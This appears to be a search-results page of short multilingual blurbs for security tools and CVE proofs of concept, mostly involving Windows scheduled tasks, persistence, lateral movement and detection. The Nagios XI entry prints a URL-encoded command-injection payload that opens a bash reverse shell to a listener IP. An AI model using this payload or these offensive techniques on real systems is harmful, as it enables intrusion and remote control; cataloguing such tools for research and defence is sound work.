2064 matches found
CVE-2022-23940
CVE-2022-23940 PoC para CVE-2022-23940, también conocido como SCRMBT-187 - Ejecución remota de código autenticada a través de informes programados en SuiteCRM = 8.0.0. Defaults to False --help Show this message and exit. https://github.com/manuelz120/CVE-2022-23940...
CVE-2019-20197
CVE-2019-20197 Vulnerabilidad de ejecución remota de comandos en Nagios XI = v5.6.9 Payload http://10.10.20.100:81/nagiosxi//includes/components/scheduledreporting/schedulereport.php id=a%22%3B%2fbin%2fbash%20-l%20%3E%20%2fdev%2ftcp%2f10.10.20.166%2f8989%200%3C%261%202%3E%261%0A%3B Burpsuite...
toolkit
English | Español Indetectables Toolkit Designed as a Swiss Army knife, this curated toolkit is invaluable for malware analysts, crackers, and cybersecurity experts. It is meticulously crafted to support both novice and experienced users. This toolkit complements the manuals and the numbered...
TaskHound
Windows Privileged Scheduled Task Discovery Tool for fun and profit. TaskHound hunts for Windows scheduled tasks that run with privileged accounts and stored credentials. It enumerates tasks over SMB, parses XMLs, and identifies high-value attack opportunities through BloodHound integration. For...
CVE-2025-60710
CVE-2025-60710 Este es un PoC para la vulnerabilidad de escalada de privilegios local en la tarea programada \Microsoft\Windows\WindowsAI\Recall\PolicyConfiguration. Cuando se inicia esta tarea programada, el proceso taskhostw.exe intentará abrir el directorio...
ScheduleRunner
ScheduleRunner - 一个具有更高灵活性的C工具,用于定制红队操作中的计划任务,以支持持久化和横向移动 计划任务是过去十年中最流行的攻击技术之一,如今黑客/红队成员仍常将其用于持久化和横向移动。 已有多种C工具被开发出来模拟使用计划任务的攻击。我尝试过其中一些,但每个工具在定制计划任务方面都有其局限性。因此,本项目旨在提供一个C工具(兼容CobaltStrike的execute-assembly),包含我所需要的功能,并提供足够的灵活性来定制计划任务。 截图: 方法 /method: 方法| 功能 ---|--- create| 创建一个新的计划任务 delete|...
CVE-2023-23192
CVE-2023-23192 CVE-2023-23192- Userlock - Multi-Factor Authentication MFA Bypass Exploit Title: Userlock - Multi-Factor Authentication MFA Bypass Date: 01/11/2023 Exploit Author: Pinar Sadioglu Vendor Homepage: https://www.isdecisions.com/products/userlock/help/ Version: = 11.0.1.40 Tested on:...
s3crets_scanner
S3cret Scanner: 在公开S3存储桶中搜寻泄露的秘密 S3cret Scanner 工具旨在为 Amazon S3 安全最佳实践提供补充层,通过在公开S3存储桶中主动搜索秘密。 可作为 计划任务 或 按需 执行 自动化工作流 自动化将执行以下操作: 1. 列出账户中的公开存储桶(设置为 ACL 为 Public 或 对象可公开) 2. 列出文本或敏感文件(即 .p12、.pgp 等) 3. 依次下载、扫描(使用 truffleHog3)并删除磁盘上的文件,完成后逐个评估。 4. 日志将创建在 logger.log 文件中。 先决条件 1. Python 3.6 或更高版本 2...
ThreatScraper
ThreatScraper ThreatScraper es una herramienta basada en Python diseñada para comprobar información sobre virus utilizando la API de VirusTotal. Ofrece funcionalidades como programar la comprobación en horarios específicos, mostrar y guardar el gráfico de tendencias de detección de malware, así...
pyGPOAbuse
pyGPOAbuse 由 D4RKMATT3R 添加的过滤器功能 免责声明:此功能仅在本地 AD 环境中进行了简要测试。对于任何未预见的行为或故障,我不承担任何责任。本工具按原样提供,仅用于授权测试,完全由您自行承担风险。 现在支持类似 SharpGPOAbuse 的基于过滤器的用户或主机定位。 场景:GPO 链接到 Active Directory 域,因此任务将应用于该域内的所有受影响对象(用户/主机),这会产生大量不必要的噪音和痕迹。因此,更推荐采用针对性方法,例如仅在域控制器上执行命令。 root@kitploit: 通过过滤器进行主机/用户定位(类似 SharpGPOAbuse...
GhostTask
Ghost Scheduled Task Inspirado por la investigación de WithSecure sobre manipulación de tareas programadas, explicaron la viabilidad de crear una tarea programada únicamente mediante manipulación de claves de registro. Este enfoque puede eludir la generación de registros de eventos de creación de...
Bug-Bounty-Arsenal-v.3
BugBounty Arsenal Una plataforma gratuita de escaneo de seguridad full-stack para cazadores de bug bounty e investigadores de seguridad — más de 50 detectores, monitorización continua y control de CI/CD desde un solo panel. ▶ App en vivo:bugbounty-arsenal.net — gratis, sin tarjeta de crédito. Si...
WMIExec
WMIexec 一组Python脚本,通过WMI协议以不同方式执行命令。 博客文章 https://whiteknightlabs.com/2023/06/26/navigating-stealthy-wmi-lateral-movement/ 使用方法 wmiexecscheduledjob.py 是一个Python脚本,通过计划任务认证到远程WMI实例并执行命令。 运行脚本: root@kitploit: python3 wmiexecscheduledjob.py -i -u -p -c wmiexecwin32process.py...
NorkNork
NorkNork - 用于识别 Empire 持久化后门的工具 https://www.n00py.io/2017/01/removing-backdoors-powershell-empire-edition/ 关于: 此脚本设计用于在 Windows 系统上识别 Powershell Empire 持久化后门。 目前支持检查以下持久化方法: 计划任务 自动运行 WMI 订阅 安全支持提供程序 轻松访问中心后门 计算机账户密码禁用 安装: 你可以使用 Python 2.7 运行此脚本,或下载 pyinstaller 编译的可执行文件。在 PowerShell 窗口中运行二进制文件或脚本...
rainmap-lite
rainmap-lite Rainmap Lite - 响应式Web应用,允许用户从手机/平板/浏览器启动Nmap扫描! 与其前身1不同,Rainmap-lite不需要特殊服务(RabbitMQ、PostgreSQL、Celery、supervisor等),因此可以轻松安装在任何服务器上。你只需安装Django应用并添加cron轮询任务即可设置新的扫描服务器。随时随地都能进行Nmap扫描! 1 Rainmap - https://nmap.org/rainmap/ 特性 只需几次点击即可轻松启动Nmap扫描。 响应式界面,在手机/平板上流畅运行。 报告通过电子邮件以所有格式发送。...
CVE-2021-32156
..| CSRF a RCE CRON |.. Descripción : Explotando un ataque de Cross-site request forgery CSRF para obtener una Ejecución Remota de Comandos RCE a través de la función de Trabajos Cron Programados de Webmin Versión Probada : Webmin 1.973 última versión de GitHub 07/03/2021 Tipo de Ataque: Remoto...
SharpStay
SharpStay - Persistencia .NET Compilación Para compilar, abre el proyecto de Visual Studio y compila para release. Opciones Claves de Registro Elevadas Clave de Registro UserInit Elevada Tarea Programada Elevada Crear Servicio Elevado Suscripción a Evento WMI Elevada Clave de Registro...
SharpPolarBear
SharpPolarBear 这是 SandboxEscaper 在此处(https://github.com/SandboxEscaper/polarbearrepo)发布的其中一个漏洞的武器化版本。 大部分代码来自 rasta-mouse 的 CollectorService 仓库(https://github.com/rasta-mouse/CollectorService)。我只是将原始 SandboxEscaper C++ 代码中的 CVE-2019-0841 漏洞代码改为了 C,并添加了一些检查。 我还加入了所需的二进制文件(schtasks.exe、schedsvc.dll...
CVE-2026-3502-Scanner---TrueConf-Vulnerability-Detection-Tool
🔍 CVE-2026-3502 Scanner - TrueConf Vulnerability Detection Tool ⚠️ WARNING For educational purposes and authorized testing only. 📋 Description Detection tool for CVE-2026-3502. Scans TrueConf servers without update verification, detects vulnerable Windows clients ≤8.5.3.884, and searches for...
CVE-2026-89031
The Adenion Blog2Social WordPress plugin before version 9.1.0 is affected by a broken access control vulnerability in the b2s_calendar_move_post AJAX handler (includes/Ajax/Post.php). The handler issues an UPDATE against the b2s_posts table using only the attacker-supplied b2s_id primary key with...